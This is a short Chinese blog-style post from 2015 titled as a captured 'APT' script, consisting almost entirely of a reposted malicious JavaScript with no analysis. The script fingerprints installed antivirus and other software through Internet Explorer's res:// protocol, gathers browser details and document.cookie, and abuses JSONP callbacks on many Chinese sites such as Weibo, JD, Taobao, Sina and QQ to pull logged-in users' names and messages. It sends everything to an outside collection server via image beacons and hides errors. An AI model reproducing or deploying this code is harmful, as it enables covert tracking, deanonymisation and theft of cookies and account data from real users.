抓到一个搞APT的JS
浏览数:48 /
时间:2015年06月09日
代码具体有什么用我就不说了,有多屌自己看撒。
//使用Javascript并结合RES协议判断软件是否存在。 //havesoft变量用于保存存在软件的信息 var havesoft = ‘no ie ‘; function program(name, path) { this.name = name; this.path = path; } //设置需要遍历的磁盘,默认为扫描C,D。 var disk=[‘c‘,‘d‘]; //变量soft部分设置的是需要检测软件安装的常见路径和相应的资源编号。 var soft=[new program(‘office 2003‘, ‘:\\Program Files\\Microsoft Office\\OFFICE11\\STSLIST.DLL/2/10100‘), new program(‘office2007‘, ‘:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE/2/5500‘), new program(‘360安全卫士‘, ‘:\\Program Files\\360\\360Safe\\360leakfixer.exe/2/110‘), new program(‘360保险箱‘, ‘:\\Program Files\\360\\360safebox\\BoxChecker.exe/2/203‘), new program(‘WinRAR‘, ‘:\\Program Files\\WinRAR\\WinRAR.exe/2/101‘), new program(‘QQ 2009‘, ‘:\\Program Files\\Tencent\\QQ\\Bin\\RICHED20.DLL/2/2100‘), new program(‘暴风影音‘, ‘:\\Program Files\\StormII\\StormSkinRes.dll/2/193‘), new program(‘迅雷‘, ‘:\\Program Files\\Thunder Network\\Thunder\\Program\\Thunder.exe/2/138‘), new program(‘360杀毒‘, ‘:\\Program Files\\360\\360sd\\mfc42u.dll/2/26567‘), new program(‘Foxit Reader‘, ‘:\\Program Files\\Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/279‘), new program(‘Visual C++ 6.0‘, ‘:\\Program Files\\Microsoft Visual Studio\\VC98\\Setup\\1033\\VC98ENT.DLL/2/101‘), new program(‘Visual Studio 2008‘, ‘:\\Program Files\\Microsoft Visual Studio 9.0\\Common7\\IDE\\devenv.exe/2/6609‘), new program(‘VMware‘, ‘:\\Program Files\\VMware\\VMware Workstation\\p2vWizard.dll/2/134‘), new program(‘Maxthon2‘, ‘:\\Program Files\\Maxthon2\\Maxthon.exe/2/128‘), new program(‘Daemon Tools lite‘, ‘:\\Program Files\\DAEMON Tools Lite\\DTCommonRes.dll/2/209‘), new program(‘EditPlus 3‘, ‘:\\Program Files\\EditPlus 3\\editplus.exe/2/126‘), new program(‘TrueCrypt‘, ‘:\\Program Files\\TrueCrypt\\TrueCrypt.exe/2/112‘), new program(‘Foxmail‘, ‘:\\Program Files\\Foxmail\\foxmail.exe/2/RAM‘), new program(‘Nod32 AntiVirus‘, ‘:\\Program Files\\ESET\\ESET NOD32 Antivirus\\mfc80.dll/2/32384‘), new program(‘Nmap‘, ‘:\\Program Files\\Nmap\\Uninstall.exe/2/110‘), new program(‘WinSCP‘, ‘:\\Program Files\\WinSCP\\WinSCP.exe/2/BBALL‘), new program(‘Kaspersky Internet Security 2010‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\avzkrnl.dll/2/BBALL‘), new program(‘瑞星杀毒‘, ‘:\\Program Files\\Rising\\Rav\\RsConfig.dll/2/100‘), new program(‘BitDefender 2010‘, ‘:\\Program Files\\BitDefender\\BitDefender 2010\\history.exe/2/301‘), new program(‘Avast4‘, ‘:\\Program Files\\Alwil Software\\Avast4\\ashAvast.exe/2/267‘), new program(‘Avira AntiVir Desktop‘, ‘:\\Program Files\\Avira\\AntiVir Desktop\\rcimage.dll/2/106‘), new program(‘F-Secure‘, ‘:\\Program Files\\F-Secure\\Anti-Virus\\fsavinst.dll/2/100‘), new program(‘McAfee VirusScan Enterprise‘, ‘:\\Program Files\\McAfee\\VirusScan Enterprise\\nailite.dll/2/110‘), new program(‘金山毒霸‘, ‘:\\Program Files\\Kingsoft\\Kingsoft Antivirus\\krecycle.exe/2/130‘), new program(‘趋势安全专家‘, ‘:\\Program Files\\Trend Micro\\Internet Security\\TmChLang.exe/2/30994‘), new program(‘Kaspersky Internet Security 6.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\oeas.dll/2/206‘), new program(‘Kaspersky Internet Security 7.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\oeas.dll/2/206‘), new program(‘Kaspersky Internet Security 2009‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206‘), new program(‘AVG AntiVirus 9‘, ‘:\\Program Files\\AVG\\AVG9\\avguires.dll/2/100‘), new program(‘江民杀毒‘, ‘:\\Program Files\\JiangMin\\AntiVirus\\KvpViewer.exe/2/133‘), new program(‘ZoneAlarm‘, ‘:\\Program Files\\Zone Labs\\ZoneAlarm\\framewrk.dll/2/102‘), new program(‘我形我速4‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘), new program(‘我形我速5‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘), new program(‘我形我速6‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘), new program(‘我形我速4‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘), new program(‘我形我速5‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘), new program(‘我形我速6‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘), new program(‘Adobe Reader 9.0‘, ‘:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/2/103‘)]; //开始通过循环分别匹配磁盘和相应的文件,并判断文件是否存在,如果存在就说明存在软件。 if(navigator.userAgent.indexOf("MSIE")>= 0) { havesoft =‘ ‘; for(i=0;i<soft.length;i++) { for(j=0;j<disk.length;j++) { var img=new Image(); //创建新的Image对象 res=‘res://‘+disk[j]+soft[i].path; //通过RES协议引入资源文件 img.src=res; //将RES资源文件赋给img if(img.height!=30 || img.width != 28) //判断高度是否不等于30或者宽度不等于20,如果不等于,则认为有这个图片。 { havesoft = havesoft + soft[i].name + ‘, ‘; } } } } (function(){(new Image()).src=‘http://back.sinaapp.com/index.php?do=api&id=bt1kyY&location=‘+escape((function(){try{return document.location.href}catch(e){return ‘‘}})())+‘&toplocation=‘+escape((function(){try{return top.location.href}catch(e){return ‘‘}})())+‘&softver=‘+escape((function(){try{return havesoft}catch(e){return ‘‘}})())+‘&opener=‘+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:‘‘}catch(e){return ‘‘}})());})();window.onerror=function(){ return true; } http_server = "http://back.sinaapp.com/index.php?do=api&id=bt1kyY&content1="; var info = {}; info.browser = function(){ ua = navigator.userAgent.toLowerCase(); var rwebkit = /(webkit)[ \/]([\w.]+)/; var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/; var rmsie = /(msie) ([\w.]+)/; var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/; var match = rwebkit.exec( ua ) || ropera.exec( ua ) || rmsie.exec( ua ) || ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) || []; return { name: match[1] || "", version: match[2] || "0" }; }(); info.url = document.location.href; info.ua = escape(navigator.userAgent); info.lang = navigator.language; info.referrer = document.referrer; info.location = window.location.href; info.toplocation = top.location.href; info.cookie = escape(document.cookie); info.domain = document.domain; info.title = document.title; info.screen = function(){ var c = ""; if (self.screen) { c = screen.width+"x"+screen.height; } return c; }(); info.flash = function(){ var f="",n=navigator; if (n.plugins && n.plugins.length) { for (var ii=0;ii<n.plugins.length;ii++) { if (n.plugins[ii].name.indexOf(‘Shockwave Flash‘)!=-1) { f=n.plugins[ii].description.split(‘Shockwave Flash ‘)[1]; break; } } } else if (window.ActiveXObject) { for (var ii=10;ii>=2;ii--) { try { var fl=eval("new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash."+ii+"‘);"); if (fl) { f=ii + ‘.0‘; break; } } catch(e) {} } } return f; }(); function inj_script(a, b) { var o = document.createElement("script"); o.src = a; if (b) { if (!window.ActiveXObject) { o.onload = b; } else { o.onreadystatechange = function () { if (o.readyState == ‘loaded‘ || o.readyState == ‘complete‘) { b(); } } } } document.getElementsByTagName("body")[0].appendChild(o); return o; } function json2str(o) { if(typeof o == ‘string‘) return o; var arr = []; var fmt = function(s) { if (typeof s == ‘object‘ && s != null) return json2str(s); return /^(string|number)$/.test(typeof s) ? "‘" + s + "‘" : s; } for (var i in o) arr.push("‘" + i + "‘:" + fmt(o[i])); return ‘{‘ + arr.join(‘,‘) + ‘}‘; } video_login_callback = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=video_login_callback"; } e163_comment = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=e163_comment"; } weibo_login = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=weibo_login"; } sina_1368631232407449 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=sina_1368631232407449"; } jingdong_service = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jingdong_service"; } loginInfoJson = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=loginInfoJson"; } hxbase_json1368703155802logininfo = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=hxbase_json1368703155802logininfo"; } jsonp1368703516133 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368703516133"; } ajaxLogan_updateNickName = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=ajaxLogan_updateNickName"; } jsonp1368705676193 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368705676193"; } jsonp1368706291697 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368706291697"; } jsonp1368751970360 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368751970360"; } jQuery1368754535817 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jQuery1368754535817"; } jQuery1368758656634 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jQuery1368758656634"; } window.onload = function(){ new Image().src = http_server + escape(json2str(info)) + "&content2=info%20"; try{ inj_script(‘http://video.baidu.com/d?m=uss&callback=video_login_callback‘); } catch(e){} try{ inj_script(‘http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment‘); } catch(e){} try{ inj_script(‘http://weibo.com/ajaxlogin.php?framelogin=0&callback=weibo_login‘); } catch(e){} try{ inj_script(‘http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449‘); } catch(e){} try{ inj_script(‘http://passport.jd.com/new/helloService.ashx?m=ls&callback=jingdong_service‘); } catch(e){} try{ inj_script(‘http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713‘); } catch(e){} try{ inj_script(‘http://shequ5.tool.hexun.com/rest/checkjson.aspx?callback=hxbase_json1368703155802logininfo‘); } catch(e){} try{ inj_script(‘http://i.56.com/api/getHomeLink.php?callback=jsonp1368703516133‘); } catch(e){} try{ inj_script(‘http://my.pconline.com.cn/intf/getLogedUser.jsp?callback=ajaxLogan_updateNickName‘); } catch(e){} try{ inj_script(‘http://passport.mop.com/common/user-info?callback=jsonp1368705676193‘); } catch(e){} try{ inj_script(‘http://jiaoyou.51.com/?c=grade&a=getMyInfoJsonp&callback=jsonp1368706291697&ie=0&_=1368706293192‘); } catch(e){} try{ inj_script(‘http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360‘); } catch(e){} try{ inj_script(‘http://lc.tiexue.net/p.tx?c=jQuery1368754535817&_=1368754537944‘); } catch(e){} try{ inj_script(‘http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639‘); } catch(e){} try{ inj_script(‘http://random.blog.sohu.com/service/profile.jsp‘); } catch(e){} try{ inj_script(‘http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1368671343288‘); } catch(e){} try{ inj_script(‘http://api.t.qq.com/inbox/pm_list.php?count1=30&t=wbpm_list.js&resp_charset=UTF8&first=1&pmlang=zh_TW&r=0.36978532862849534‘); } catch(e){} try{ inj_script(‘http://blog.ifeng.com/misc.php?script=getusername&tm=1368689210147‘); } catch(e){} try{ inj_script(‘http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368693252438&var=tianya_msg‘); } catch(e){} setTimeout(function(){ var o = Blog.camp.profile; new Image().src = http_server + escape(json2str(o)) + "&content2=Blog.camp.profile"; } ,3000); setTimeout(function(){ var o = [_passport]; new Image().src = http_server + escape(json2str(o)) + "&content2=%5B_passport%5D"; } ,3000); setTimeout(function(){ var o = PM.PMListLoaded().ma+‘|‘+PM.PMListLoaded().mn+‘|‘+PM.PMListLoaded().micn; new Image().src = http_server + escape(json2str(o)) + "&content2=PM.PMListLoaded%28%29.ma%2B%27%7C%27%2BPM.PMListLoaded%28%29.mn%2B%27%7C%27%2BPM.PMListLoaded%28%29.micn"; } ,3000); setTimeout(function(){ var o = sso_username; new Image().src = http_server + escape(json2str(o)) + "&content2=sso_username"; } ,3000); setTimeout(function(){ var o = tianya_msg.data.list[0].toUserName+‘|‘+tianya_msg.data.list[0].toUserId; new Image().src = http_server + escape(json2str(o)) + "&content2=tianya_msg.data.list%5B0%5D.toUserName%2B%27%7C%27%2Btianya_msg.data.list%5B0%5D.toUserId"; } ,3000); };
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
